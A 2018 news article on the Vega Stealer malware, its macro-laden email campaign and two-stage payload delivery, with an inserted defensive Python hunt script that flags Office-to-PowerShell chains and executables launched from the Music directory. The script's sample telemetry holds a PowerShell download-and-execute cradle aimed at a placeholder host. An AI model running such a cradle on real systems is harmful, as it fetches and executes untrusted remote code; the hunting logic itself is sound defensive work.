Posted on May 14, 2018 at 2:08 PM
Proofpoint researchers have discovered a new variant of the August Stealer malware. The new malware, named Vega Stealer, is built to infect a victim's machine and steal saved credentials and payment data from Firefox and Chrome.
New malware is an improvement on the old one
Researchers from Proofpoint have uncovered a new form of an older malware family, August Stealer. The updated version, named Vega Stealer, steals credit-card data and credentials saved in the Firefox and Google Chrome browsers. The real concern, however, is that the malware has the potential to outgrow its current payload and become a much larger problem.
The connection to August Stealer was made after the researchers found that the new malware reproduces August's functionality and adds new features on top of it.
Beyond browser data, Vega can also exfiltrate various kinds of files, including PDF, Excel and Word documents. For now this matches what August could do, although in the parent malware the targeted file types were not hard-coded. Vega's ability to steal from Chrome is likewise inherited from August, which could additionally target other browsers and applications such as Skype.
Vega's genuinely new features are the ability to steal from Firefox and the addition of a network communication protocol.
As for how Vega spreads, researchers have so far observed a single infection attempt via an email campaign. Emails with subjects like "Online store developer required" were sent both to individuals and to larger distribution lists. Each carried an attachment named brief.doc, which contained the malicious macro that starts the infection.
So far the campaign has targeted fairly specific sectors: retail, marketing, manufacturing, public relations and advertising.
How does it work?
Retrieving the payload takes two steps. First, the document executes a request that retrieves a PowerShell script or JavaScript, which in turn issues the second request. That second request downloads the malware payload into the user's Music directory, after which a simple command line executes it automatically.
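The two-stage chain just described gives a defender two concrete things to look for in process-creation telemetry: an Office process spawning a script host, and something being executed out of the user's Music directory. The following is an added example, not code from the article or from Proofpoint. It runs a small hunt over constructed process-creation events and correlates the two stages per user; the event fields, file names, URL and user names are all assumptions made for the example, and real telemetry (for instance Sysmon process-creation events or EDR logs) would need to be mapped onto the ProcEvent fields.

```python
"""Hunt for the two-stage delivery chain: Office macro -> script host -> payload
executed from the user's Music directory.

Added example, not the article's or Proofpoint's code. Event records and field
names are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Office applications whose macros would launch the first-stage downloader.
OFFICE_PROCS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script hosts that the article says fetch and run the second stage.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Payload drop location named in the article: the user's Music directory.
MUSIC_DIR_RE = re.compile(r"\\users\\[^\\]+\\music\\", re.IGNORECASE)


@dataclass
class ProcEvent:
    ts: str        # timestamp (constructed)
    user: str      # account the process runs as
    parent: str    # parent image path
    image: str     # new process image path
    cmdline: str   # full command line of the new process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_script_host(ev: ProcEvent) -> bool:
    """Stage 1: an Office process starting PowerShell/WScript/etc."""
    return basename(ev.parent) in OFFICE_PROCS and basename(ev.image) in SCRIPT_HOSTS


def launches_from_music_dir(ev: ProcEvent) -> bool:
    """Stage 2: a binary in the Music directory is executed, either directly
    or via a command line such as cmd.exe /c "...\\Music\\x.exe"."""
    return bool(MUSIC_DIR_RE.search(ev.image)) or bool(MUSIC_DIR_RE.search(ev.cmdline))


def hunt(events):
    """Return (ts, user, severity, detail) findings. A stage-2 hit for a user
    who already produced a stage-1 hit is escalated to 'chain'."""
    findings = []
    stage1_users = set()
    for ev in events:
        if office_spawns_script_host(ev):
            findings.append((ev.ts, ev.user, "stage1",
                             f"{basename(ev.parent)} -> {basename(ev.image)}"))
            stage1_users.add(ev.user)
        if launches_from_music_dir(ev):
            sev = "chain" if ev.user in stage1_users else "stage2"
            findings.append((ev.ts, ev.user, sev, ev.cmdline))
    return findings


# Constructed sample telemetry: one infected user (alice) and one benign
# PowerShell use (bob). Paths, names and the URL are made up for the example.
SAMPLE_EVENTS = [
    ProcEvent("10:01:03", "CORP\\alice", r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\brief.doc"'),
    ProcEvent("10:01:09", "CORP\\alice",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -nop -c IEX(New-Object Net.WebClient)"
              r".DownloadString('http://example.invalid/stage1')"),
    ProcEvent("10:01:15", "CORP\\alice",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\alice\Music\payload.exe"'),
    ProcEvent("10:05:00", "CORP\\bob", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\backup.ps1"),
]


if __name__ == "__main__":
    for ts, user, sev, detail in hunt(SAMPLE_EVENTS):
        print(f"{ts} {user:12} {sev:7} {detail}")
```

On the sample data the hunt reports a stage-1 hit for alice (WINWORD.EXE spawning powershell.exe) and then escalates her Music-directory execution to a full chain, while bob's ordinary PowerShell use produces nothing. Either stage on its own is noisy in a real estate (scheduled scripts, users who keep files in Music), which is why the per-user correlation is the part worth keeping.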
This approach is not only reminiscent of what August Stealer did but also closely resembles the Ursnif banking trojan, which has led researchers to consider it a commodity macro that can be bought and sold. According to their report, the URL patterns used to fetch the payload are identical to those seen in Ursnif distribution. With that in mind, it is possible that both pieces of malware come from the same source.
Researchers say Vega was written in .NET and may have been created for this campaign alone, given its lack of obfuscation or packing. That does not mean it could not be reused in the future.
So far it is neither particularly stealthy nor as complex as much other malware. It is, however, a clear indication that malware, and the people who write and operate it, may be more adaptable than previously believed. If Vega reaches its full potential, its impact could be considerably larger.